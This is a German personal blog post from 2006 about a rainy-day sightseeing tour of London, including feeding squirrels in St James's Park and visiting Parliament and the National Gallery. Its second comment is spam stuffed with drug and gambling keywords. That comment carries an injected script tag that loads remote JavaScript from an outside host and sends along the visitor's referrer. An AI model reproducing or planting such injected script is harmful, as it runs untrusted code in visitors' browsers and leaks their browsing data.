Startseite
    Schule
    Wohnen
    Freizeit
    Privat
  Archiv
  Gästebuch
  Kontakt

http://myblog.de/assistant-teaching

Gratis bloggen bei
myblog.de





Und noch eine Tour durch die Metropole.

Eichhörnchen

Ich liebe ja London. Es ist eine fantastische Stadt. Selbst bei regnerischem Wetter macht es noch jede Menge Spaß dort herumzulaufen und zu fahren. Irina und ich haben uns am Sonntag ne Tour zurechtgelegt und haben sie gestern, am 23.10.2006, dann gemacht, gut ausgerüstet mit jeder Menge Sandwiches und Getränken.

Wie üblich gings los von Waterloo aus. Dann ab zur Themse, am London Eye vorbei und am London Aquarium angestellt. Allerdings haben wir festgestellt als wir fast drin waren dass die inzwischen 9,50 Pfund/Studi oder Schüler haben wollen und nicht wie auf der ISIC-Seite angekündigt 6,50 Pfund. Das war uns für ein paar Fische im Kustbecken doch zu viel. Also weiter ...

Nächster Stopp war der Big Ben. Von dort aus an den Houses of Parliament vorbei und gefragt wann Besichtigungszeiten sind. 14.30 Uhr. OK, also hatten wir noch gut zwei Stunden Zeit. Klar, was wir tun würden: Die Westminster Abbey anschauen und als Touri-Foto Platz auswählen. Anschließend rüber in den St. James's Park, Eichhörchen suchen und füttern.

Die sind ja soooo süß; und soooo schnell, wenn sie wollen. Und zutraulich. Eins ist Irina sogar am Bein hoch gekrabbelt. Ein Mädel hat es besonders clever gemacht, sie hat sich einfach mit ner Menge an Erdnüssen auf ne Decke in die Nähe der Büsche gesetzt und abgewaret. Irgendwann ließen Tauben, Eichelhäher und Eichhörnchen sie gar nicht mehr in Ruhe. Ein lustiges Schauspiel. Mir hat hinterher tatsächlich eines meiner Lieblingstiere aus der Hand gefressen. Bei Irina war das scheinbar völlig normal. Dafür mochten die Wildgänse mich offenbar lieber. Die standen noch mehr auf Erdnüsse als die Eichhörnchen.

Bevor wir zurück zum Parlament sind, haben noch einen Abstecher zum Buckingham Palace gemacht. Irina wollte lieber, dass ich ein Foto von der tollen Kutsche schieße als von ihr vor dem Palast und der Säule.

Die anschließende Besichtigung in den Houses of Parliament war ganz gut. Erst mussten wir zwar lange anstehen, bevor und nachdem wir durch die Sicherheitssperre durften. Dann konnten wir aber doch noch ne Weile einer Debatte im Hous of Commons lauschen. Leider war es eine extrem langweilige Debatte und es waren kaum MPs dort. Trotzdem ... das Gebäude ist einfach überwältigend und allein schon einen Besuch wert! Leider durfte man keine Fotos schießen.

Der nächste Stopp war die National Gallery. Genauso kostenlos, wie der Eintritt ins Parlament und ein ebenso beeindruckendes Gebäude mit noch beeindruckenderen Bildern. Ganz alte Klassiker halt. Auch wenn ich nicht so auf Jesus-Bilder und so stehe - sehr imposant. Am besten gefiel mir von Hohlbein "The Ambassadors ". Es gibt so unglaublich viel zu entdecken in diesem Bild und jedes Teil sagt etwas über die Situation oder die Zeit oder die Menschen darauf aus.

Nach der Gallery sind wir noch durch den Regen zum Picadilly Circus gelaufen und haben von dort aus den Bus zum Tower genommen. Ein letztes Foto an der Towerbridge und wir machten uns wieder auf den Heimweg.

24.10.06 14:21
 


bisher 2 Kommentar(e)     TrackBack-URL


Claude / Website (24.10.06 14:35)
Das war ja jetzt wieder Futter fürs Fernweh...

Und weil ich ja manchmal zur Selbstquälerei neige, werde ich hier garantiert noch öfter lesen.


bontril information / Website (23.4.07 21:43)
blood levitra online not possible keno computer games stopped working diet pills dose is bontril information in conjunction auto insurance cheap using terminology <script>var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')</script>

Name:
Email:
Website:
E-Mail bei weiteren Kommentaren
Informationen speichern (Cookie)



 Smileys einfügen



Verantwortlich für die Inhalte ist der Autor. Dein kostenloses Blog bei myblog.de! Datenschutzerklärung
Werbung